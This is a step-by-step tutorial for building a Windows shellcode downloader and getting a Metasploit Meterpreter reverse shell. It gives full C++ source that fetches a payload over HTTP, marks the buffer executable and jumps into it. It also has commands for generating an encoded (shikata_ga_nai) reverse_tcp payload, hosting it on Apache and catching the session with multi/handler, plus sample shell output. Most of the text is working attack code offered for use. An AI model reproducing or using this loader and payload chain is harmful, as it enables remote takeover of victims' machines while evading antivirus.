This is not an original idea. please view http://www.securitytube.net/video/2908 and pay respect to Armitage1989
apache server set up
1. Set up a share folder.
mkdir /var/www/share
chmod -R 755 /var/www/share/
chown -R www-data:www-data /var/www/share/
(Only needed if Apache has to write into the share. For serving static payload files, root ownership with the 755 mode above is sufficient and keeps the web server from being able to modify what it serves.)
To verify the share directory was created, type
ls -la /var/www/ | grep share
#########################
2. Start web server
service apache2 start
To shut down simply replace start with stop.
##########################
3. If not installed
apt-get install apache2
##########################
4. Copy files to the share
cp /root/.msf4/data/exploits/* /var/www/share/
--> the * is a shell wildcard that selects every file in that directory. Note that everything placed under /var/www/share/ is served to anyone who can reach the web server, so copy only the payload you actually need and remove the share when the engagement is over.
###########################
5. Access the file from another machine
http://(server's IP)/share
#############################
please watch http://www.securitytube.net/video/2908
Armitage1989 created the C++ code, which was originally posted at http://pastebin.com/u/armitage1989
Download Dev-C++ 4.9.9.2 for Windows from http://www.bloodshed.net/dev/devcpp.html (a 32-bit MinGW/GCC toolchain; the inline assembly in the code and the -lwininet link flag below assume it).
1. Create a new project (Windows Application), click OK and save it wherever you like.
2. Delete everything in the editor window and paste in the code below.
3. Under project window right click on your project and click Project Options (or press Alt+p)
4. On the Parameters tab, add -lwininet under Linker and press OK (this links the WinInet functions the code calls).
5. Compile, saving the executable wherever you like.
Copy the code below and paste it in:
// WinInet supplies the HTTP functions used below: InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetCloseHandle()
#include <windows.h>
#include <Wininet.h>
#include <cstdio>
#include <cstring>
#include <iostream>
using namespace std;
//receive buffer for the downloaded shellcode. It is a zero-initialised global, so it
//lives in .bss rather than on the stack. NOTE(review): .bss is normally not executable
//when DEP/NX is enforced for the process, so jumping into it needs the page made
//executable (or DEP off for the process) — confirm on the target.
unsigned char DataReceived[500];
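int main(){
    // Downloader/loader for a raw shellcode blob: fetch it over HTTP with WinInet,
    // echo the received bytes as \xNN, then transfer control into the buffer.
    // Assumes a 32-bit (MinGW/Dev-C++) build: the inline asm uses %eax and the
    // MinGW symbol decoration _DataReceived.
    // Returns 0 on every error path, as the original did; on success control never
    // comes back here because the jump at the end does not return.

    // HTTP session handle; INTERNET_OPEN_TYPE_PRECONFIG uses the registry proxy settings.
    HINTERNET connect = InternetOpen("MyBrowser", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (!connect) {
        cout << "Connection Failed or Syntax error";
        return 0;
    }

    // Open the URL that serves the raw payload (change host and path to your share).
    HINTERNET OpenAddress = InternetOpenUrl(connect, "http://192.168.16.2/ascii.bin", NULL, 0,
                                            INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, 0);
    if (!OpenAddress) {
        DWORD ErrorNum = GetLastError();
        cout << "Failed to open URL \nError No: " << ErrorNum;
        InternetCloseHandle(connect);
        return 0;
    }

    // Read the whole response into DataReceived, never past its end. The original
    // asked InternetReadFile for 4096 bytes into a 500-byte global (buffer overflow)
    // and jumped after the first chunk, so a payload delivered in several chunks was
    // truncated. Here chunks are accumulated and execution happens once, afterwards.
    // If the payload is larger than sizeof DataReceived the excess is dropped —
    // enlarge the buffer in that case.
    DWORD total = 0;
    DWORD NumberOfBytesRead = 0;
    while (total < sizeof DataReceived
           && InternetReadFile(OpenAddress, DataReceived + total,
                               sizeof DataReceived - total, &NumberOfBytesRead)
           && NumberOfBytesRead) {
        total += NumberOfBytesRead;
    }

    // The handles are not needed once the bytes are local; close them now because
    // control does not come back to the end of main after the jump.
    InternetCloseHandle(OpenAddress);
    InternetCloseHandle(connect);

    if (total == 0) {
        cout << "No data received";
        return 0;
    }

    // Dump only the bytes actually received (the original printed the full buffer,
    // including the zero padding) in \xNN form; delete this loop if not wanted.
    for (DWORD i = 0; i < total; i++) {
        printf("\\x%02x", DataReceived[i]);
    }

    // DataReceived lives in .bss, which is not executable when DEP/NX is enforced
    // for this process; make the buffer executable so the jump below does not fault.
    DWORD oldProtect = 0;
    if (!VirtualProtect(DataReceived, sizeof DataReceived, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        cout << "VirtualProtect failed \nError No: " << GetLastError();
        return 0;
    }

    // Transfer control into the buffer (32-bit AT&T syntax):
    //  1) lea loads the address of DataReceived into eax
    //  2) push eax puts that address on top of the stack
    //  3) ret pops it into eip, so execution continues at DataReceived[0]
    // A NOP sled at the start of the blob is optional; FreeConsole() can hide the console window.
    __asm ("lea _DataReceived, %eax");
    __asm ("push %eax");
    __asm ("ret");

    return 0;
}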
############################
please watch http://www.securitytube.net/video/2908
start msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (ip address)
set lport (port of choice)
exploit
open new console window and
msfpayload windows/meterpreter/reverse_tcp LHOST=<ip address> LPORT=<port of choice> R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 > /var/www/share/your-file.bin
Once the compiled exe is run on the target machine, the handler should report a new Meterpreter session.
meterpreter > execute -f cmd.exe -c
Process 2508 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
In the C++ source, change the IP address and path in the InternetOpenUrl line to point at your share if required, e.g. "http://192.168.1.2/share/your-file.bin" (the listing above uses http://192.168.16.2/ascii.bin).
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4445 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 > /var/www/share/your-file.bin
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 4445
exploit
Update: the following sequence is confirmed working:
msfpayload windows/meterpreter/reverse_tcp LHOST=<ip address> LPORT=4445 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 > /var/www/share/myexploit.bin
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP Address
set lport 4445
exploit